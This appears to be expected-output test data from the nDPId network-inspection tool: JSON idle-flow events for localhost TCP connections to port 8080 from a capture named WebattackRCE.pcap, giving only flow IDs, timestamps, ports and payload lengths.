00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
